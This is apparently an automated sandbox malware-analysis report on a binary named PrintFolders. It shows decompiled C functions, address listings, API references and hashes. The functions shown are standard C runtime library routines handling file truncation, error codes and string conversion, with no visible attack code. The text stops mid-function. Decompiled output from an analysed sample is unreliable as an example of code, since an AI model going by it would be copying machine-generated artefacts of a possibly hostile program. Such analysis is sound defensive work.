									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00411EBB(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00412BBB(_t103, _t108[0x18], E0041011F( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00412BCB(_t103, _t108[0x18], E0041011F( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E0041011F();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00411ebb
0x00411ebd
0x00411ec2
0x00411ec7
0x00411ec9
0x00411ecc
0x00411ed1
0x00411fe1
0x00411fe1
0x00411fe1
0x00000000
0x00411ee0
0x00411ee0
0x00411ee5
0x00411eef
0x00411ef1
0x00411ef6
0x00411efb
0x00411efb
0x00411efd
0x00411f00
0x00411f05
0x00411f27
0x00411f27
0x00411f2a
0x00411f2d
0x00411f4b
0x00411f4e
0x00411f8d
0x00411f90
0x00411f93
0x00411fb8
0x00411fba
0x00000000
0x00411fbc
0x00411fbc
0x00411fbe
0x00000000
0x00411fc0
0x00411fc0
0x00411fc5
0x00411fc9
0x00411fc9
0x00411fca
0x00000000
0x00411fca
0x00411fbe
0x00411f95
0x00411f95
0x00411f97
0x00000000
0x00411f99
0x00411f99
0x00411f9b
0x00000000
0x00411f9d
0x00411fae
0x00000000
0x00411fb3
0x00411f9b
0x00411f97
0x00411f50
0x00411f50
0x00411f54
0x00000000
0x00411f5a
0x00411f5a
0x00411f5c
0x00000000
0x00411f62
0x00411f69
0x00411f71
0x00411f75
0x00411f77
0x00411f7a
0x00411f7f
0x00411f80
0x00000000
0x00411f80
0x00411f7a
0x00000000
0x00411f75
0x00411f5c
0x00411f54
0x00411f2f
0x00411f2f
0x00000000
0x00411f2f
0x00411f0c
0x00411f0c
0x00411f11
0x00411f16
0x00000000
0x00411f18
0x00411f1a
0x00411f23
0x00411f32
0x00411f34
0x00411ff3
0x00411ff3
0x00411ff8
0x00411ff9
0x00411ffb
0x00412000
0x00412005
0x00412008
0x0041200b
0x0041200e
0x00412017
0x00412017
0x00412010
0x00412010
0x00412010
0x0041201a
0x0041201e
0x00412021
0x00412022
0x00412023
0x00412024
0x00412027
0x00412030
0x00412030
0x00412033
0x00412069
0x00412035
0x00412035
0x00412035
0x00412038
0x0041204f
0x0041204f
0x00412038
0x0041206e
0x00412078
0x00412084
0x00411f42
0x00411f42
0x00411f47
0x00411f48
0x00411f82
0x00411f89
0x00411fcd
0x00411fcd
0x00411fd4
0x00411fe3
0x00411fe6
0x00411ff2
0x00411ff2
0x00411f34
0x00411f16
0x00000000
0x00000000
0x00000000
0x00411ee5

APIs

___AdjustPointer.LIBCMT ref: 00411F82
___AdjustPointer.LIBCMT ref: 00411FA5
___AdjustPointer.LIBCMT ref: 00412041

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0ca896192a9c401899d42e9f7ec41fae97fe56b9a9dc6cb600518f1b51295347
Instruction ID: 6bd07d1b73092418ee2073320d9761de18afaf30efd0c82ef62646a350b6d03e
Opcode Fuzzy Hash: 0ca896192a9c401899d42e9f7ec41fae97fe56b9a9dc6cb600518f1b51295347
Instruction Fuzzy Hash: 63510172605206AFDB289F51D881BFA77A4FF04304F14012FEA05976A1D779ECC2CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042B33E Relevance: 6.1, APIs: 4, Instructions: 132
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0042B33E(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E0042B2F1( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E004135F1(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E0041D158(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E004255B2(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E0041D158(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E004135F1(__eflags))) = 0xd;
						_t36 = E004135DE(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E0041E25B(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E0041AEDA(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E00421028(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E004135DE(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E004135F1(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E004135F1(_t70)));
										E0041E2B8(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E0041AEDA(_t56, _t50, _v12);
							E0041E2B8(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E004135F1(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

0x0042b33e
0x0042b347
0x0042b356
0x0042b364
0x0042b48d
0x0042b492
0x00000000
0x0042b379
0x0042b379
0x0042b37c
0x0042b37f
0x0042b382
0x0042b384
0x0042b449
0x0042b452
0x0042b459
0x0042b45c
0x0042b45f
0x00000000
0x00000000
0x0042b46f
0x0042b471
0x0042b416
0x0042b416
0x0042b494
0x0042b49f
0x0042b4ad
0x0042b4ad
0x0042b478
0x0042b47e
0x0042b48b
0x00000000
0x0042b48b
0x0042b38a
0x0042b3a0
0x0042b3a3
0x0042b3a4
0x0042b3a6
0x0042b3c1
0x0042b3c4
0x0042b3c7
0x0042b3c8
0x0042b3c8
0x0042b3ca
0x0042b3dd
0x0042b3dd
0x0042b3df
0x0042b3e2
0x0042b3e7
0x0042b3ea
0x0042b3ed
0x0042b41f
0x0042b422
0x0042b429
0x0042b429
0x0042b42f
0x0042b435
0x0042b437
0x00000000
0x0042b43c
0x0042b3ef
0x0042b3f0
0x0042b3f2
0x0042b3f5
0x0042b3f7
0x0042b3fa
0x0042b3fc
0x0042b3d6
0x0042b3d6
0x00000000
0x0042b3d6
0x0042b3fe
0x00000000
0x00000000
0x00000000
0x0042b3fe
0x0042b3cc
0x00000000
0x00000000
0x0042b3ce
0x0042b3d4
0x00000000
0x00000000
0x00000000
0x0042b400
0x0042b400
0x0042b400
0x0042b408
0x0042b40e
0x0042b413
0x00000000
0x0042b413
0x0042b3ad
0x00000000
0x0042b43f
0x0042b43f
0x0042b441
0x00000000
0x00000000
0x0042b443
0x00000000
0x00000000
0x0042b445
0x0042b447
0x00000000
0x00000000
0x00000000
0x0042b447
0x0042b38a

APIs

_free.LIBCMT ref: 0042B40E
_free.LIBCMT ref: 0042B437
SetEndOfFile.KERNEL32(00000000,0042860C,00000000,0041E0F8,?,?,?,?,?,?,?,0042860C,0041E0F8,00000000), ref: 0042B469
GetLastError.KERNEL32(?,?,?,?,?,?,?,0042860C,0041E0F8,00000000,?,?,?,?,00000000), ref: 0042B485

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: de3f6e69295ed1edb17ce482ba4b705cbafdd08ef7baa43635d14e82ea768746
Instruction ID: 617302695e0eac8ad5dd037765c23ffc959c8119500e3a216ad439764ca44a70
Opcode Fuzzy Hash: de3f6e69295ed1edb17ce482ba4b705cbafdd08ef7baa43635d14e82ea768746
Instruction Fuzzy Hash: 59411C72B00625ABDB11AFAA9C82B9E3779EF44324F54011BF814D7292D77CC98147AD

Uniqueness

Uniqueness Score: -1.00%

Function 100092C2 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100092C2(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E1000A4B8(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E1000A4B8(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E100063D0(GetLastError());
									_t19 =  *((intOrPtr*)(E10006406(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E100098FE(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E100063D0(GetLastError());
						return  *((intOrPtr*)(E10006406(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E100098FE(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E100098E4(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x100092c9
0x100092ce
0x100092ec
0x100092ee
0x100092f1
0x1000931e
0x10009326
0x10009328
0x10009341
0x10009344
0x10009347
0x10009355
0x10009364
0x1000936c
0x1000936e
0x10009387
0x1000938a
0x1000938a
0x10009370
0x10009377
0x10009382
0x10009382
0x1000938c
0x00000000
0x1000938c
0x1000934c
0x10009351
0x10009353
0x00000000
0x00000000
0x00000000
0x10009353
0x10009331
0x00000000
0x1000933c
0x100092f3
0x100092f6
0x100092f9
0x1000930c
0x1000930f
0x100092e2
0x100092e2
0x00000000
0x100092e5
0x100092ff
0x10009304
0x10009306
0x10009390
0x10009390
0x00000000
0x10009306
0x100092d0
0x100092d5
0x100092da
0x100092dc
0x100092df
0x00000000

APIs

Part of subcall function 100098E4: _free.LIBCMT ref: 100098F2

Part of subcall function 1000A4B8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000D2A0,?,00000000,00000000), ref: 1000A564

GetLastError.KERNEL32 ref: 1000932A
__dosmaperr.LIBCMT ref: 10009331
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10009370
__dosmaperr.LIBCMT ref: 10009377

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 6740b73893a9458362bcae6edf410e802fc9121dd722963b93f7f203b79a7553
Instruction ID: 0ddff17f411571237369bc97fdb35948c87631787bb5b9b786b2356b208bbcd2
Opcode Fuzzy Hash: 6740b73893a9458362bcae6edf410e802fc9121dd722963b93f7f203b79a7553
Instruction Fuzzy Hash: 6B21B07560021AAFFB10DF618C81D1BB7ADEF442E47118618F968972D5EB70ED509BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00423B6F Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423B6F(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00420094(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00420094(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E004135BB(GetLastError());
									_t19 =  *((intOrPtr*)(E004135F1(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E00424135(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E004135BB(GetLastError());
						return  *((intOrPtr*)(E004135F1(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00424135(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00419D78(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x00423b76
0x00423b7b
0x00423b99
0x00423b9b
0x00423b9e
0x00423bcb
0x00423bd3
0x00423bd5
0x00423bee
0x00423bf1
0x00423bf4
0x00423c02
0x00423c11
0x00423c19
0x00423c1b
0x00423c34
0x00423c37
0x00423c37
0x00423c1d
0x00423c24
0x00423c2f
0x00423c2f
0x00423c39
0x00000000
0x00423c39
0x00423bf9
0x00423bfe
0x00423c00
0x00000000
0x00000000
0x00000000
0x00423c00
0x00423bde
0x00000000
0x00423be9
0x00423ba0
0x00423ba3
0x00423ba6
0x00423bb9
0x00423bbc
0x00423b8f
0x00423b8f
0x00000000
0x00423b92
0x00423bac
0x00423bb1
0x00423bb3
0x00423c3d
0x00423c3d
0x00000000
0x00423bb3
0x00423b7d
0x00423b82
0x00423b87
0x00423b89
0x00423b8c
0x00000000

APIs

Part of subcall function 00419D78: _free.LIBCMT ref: 00419D86

Part of subcall function 00420094: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,004213AE,?,00000000,00000000), ref: 00420140

GetLastError.KERNEL32 ref: 00423BD7
__dosmaperr.LIBCMT ref: 00423BDE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00423C1D
__dosmaperr.LIBCMT ref: 00423C24

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: acb329c430d9d65b703508cc3e81db56fa1fb9c9c168a09e4ae2cbd405f6ca47
Instruction ID: faa5b2d0112470651306ec9e949e2660e7ba13f531a9181b1b827704a780be5a
Opcode Fuzzy Hash: acb329c430d9d65b703508cc3e81db56fa1fb9c9c168a09e4ae2cbd405f6ca47
Instruction Fuzzy Hash: 8021F472300229AFDB205F67AC81D6BBBBDEF00369790851EF91597241D73CEE418798

Uniqueness

Uniqueness Score: -1.00%

Function 10007BAC Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E10007BAC(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x10017100; // 0xa
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E100082D2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E10008BFC(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E100082D2(__eflags,  *0x10017100, _t51);
							if(__eflags != 0) {
								E100079AE(_t51, 0x10018108);
								E10008701(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E100082D2(__eflags,  *0x10017100, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E100082D2(0,  *0x10017100, 0);
							_push(0);
							L9:
							E10008701();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E10008293(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x10017100; // 0xa
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E100076E4(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x10017100; // 0xa
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E100082D2(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E10008BFC(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E100082D2(__eflags,  *0x10017100, _t60);
								if(__eflags != 0) {
									E100079AE(_t60, 0x10018108);
									E10008701(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E100082D2(__eflags,  *0x10017100, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E100082D2(__eflags,  *0x10017100, _t20);
								_push(_t60);
								L25:
								E10008701();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E10008293(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x10017100; // 0xa
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E100076E4(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x10017100; // 0xa
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E100082D2(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E10008BFC(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E100082D2(__eflags,  *0x10017100, _t54);
											if(__eflags != 0) {
												E100079AE(_t54, 0x10018108);
												E10008701(0);
												goto L45;
											} else {
												_t40 = 0;
												E100082D2(__eflags,  *0x10017100, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E100082D2(0,  *0x10017100, 0);
											_push(0);
											L41:
											E10008701();
											goto L36;
										}
									}
								} else {
									_t54 = E10008293(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x10017100; // 0xa
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x10007bac
0x10007bac
0x10007bb7
0x10007bb9
0x10007bbe
0x10007bc1
0x10007bdf
0x10007be2
0x10007be7
0x10007be9
0x00000000
0x10007beb
0x10007bf7
0x10007bfa
0x10007bfb
0x10007bfd
0x10007c22
0x10007c24
0x10007c3d
0x10007c44
0x10007c49
0x00000000
0x10007c26
0x10007c26
0x10007c2f
0x10007c34
0x00000000
0x10007c34
0x10007bff
0x10007bff
0x10007bff
0x10007c08
0x10007c0d
0x10007c0e
0x10007c0e
0x10007c13
0x00000000
0x10007c13
0x10007bfd
0x10007bc3
0x10007bc9
0x10007bcd
0x10007bda
0x00000000
0x10007bcf
0x10007bd2
0x10007c4c
0x10007c4c
0x10007bd4
0x10007bd4
0x10007bd4
0x10007bd6
0x10007bd6
0x10007bd6
0x10007bd2
0x10007bcd
0x10007c4f
0x10007c57
0x10007c59
0x10007c5b
0x10007c63
0x10007c68
0x10007c69
0x10007c6e
0x10007c6f
0x10007c72
0x10007c8c
0x10007c8f
0x10007c94
0x10007c96
0x00000000
0x10007c98
0x10007ca4
0x10007ca7
0x10007ca8
0x10007caa
0x10007ccd
0x10007ccf
0x10007ce6
0x10007ced
0x10007cf2
0x00000000
0x10007cd1
0x10007cd8
0x10007cdd
0x00000000
0x10007cdd
0x10007cac
0x10007cb3
0x10007cb8
0x10007cb9
0x10007cb9
0x10007cbe
0x00000000
0x10007cbe
0x10007caa
0x10007c74
0x10007c7a
0x10007c7c
0x10007c7e
0x10007c87
0x00000000
0x10007c80
0x10007c80
0x10007c83
0x10007cfd
0x10007cfd
0x10007d02
0x10007d05
0x10007d06
0x10007d07
0x10007d0e
0x10007d10
0x10007d15
0x10007d18
0x10007d36
0x10007d39
0x10007d3e
0x10007d40
0x00000000
0x10007d42
0x10007d4e
0x10007d52
0x10007d54
0x10007d79
0x10007d7b
0x10007d94
0x10007d9b
0x00000000
0x10007d7d
0x10007d7d
0x10007d86
0x10007d8b
0x00000000
0x10007d8b
0x10007d56
0x10007d56
0x10007d56
0x10007d5f
0x10007d64
0x10007d65
0x10007d65
0x00000000
0x10007d6a
0x10007d54
0x10007d1a
0x10007d20
0x10007d22
0x10007d24
0x10007d31
0x00000000
0x10007d26
0x10007d26
0x10007d29
0x10007da3
0x10007da3
0x10007d2b
0x10007d2b
0x10007d2b
0x10007d2b
0x10007d2d
0x10007d2d
0x10007d2d
0x10007d29
0x10007d24
0x10007da6
0x10007dae
0x10007db0
0x10007db0
0x10007db7
0x10007c85
0x10007cf5
0x10007cf5
0x10007cf7
0x00000000
0x10007cf9
0x10007cfc
0x10007cfc
0x10007cf7
0x10007c83
0x10007c7e
0x10007c5d
0x10007c62
0x10007c62

APIs

GetLastError.KERNEL32(?,?,?,100064BF,?,10002482,00000000), ref: 10007BB1
_free.LIBCMT ref: 10007C0E
_free.LIBCMT ref: 10007C44
SetLastError.KERNEL32(00000000,0000000A,000000FF,?,100064BF,?,10002482,00000000), ref: 10007C4F

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: c9421031c8270037eee8d98a36a9266b2192190dd1963cf3c890ea5dd8583a89
Instruction ID: 40064ac180ed46dbc898ff0431a2854e633d7821ece77d32e9ad52d9302bdc28
Opcode Fuzzy Hash: c9421031c8270037eee8d98a36a9266b2192190dd1963cf3c890ea5dd8583a89
Instruction Fuzzy Hash: 2E11E976A04615BAF212D7784CC1E1B3699FBC02F4B324528F55C821EDEF75ED414320

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB63 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E0041CB63(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x43d1c8; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0041E7DF(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E0041E25B(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E0041E7DF(__eflags,  *0x43d1c8, _t51);
							if(__eflags != 0) {
								E0041C991(_t51, 0x4508d8);
								E0041E2B8(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E0041E7DF(__eflags,  *0x43d1c8, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E0041E7DF(0,  *0x43d1c8, 0);
							_push(0);
							L9:
							E0041E2B8();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E0041E7A0(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x43d1c8; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
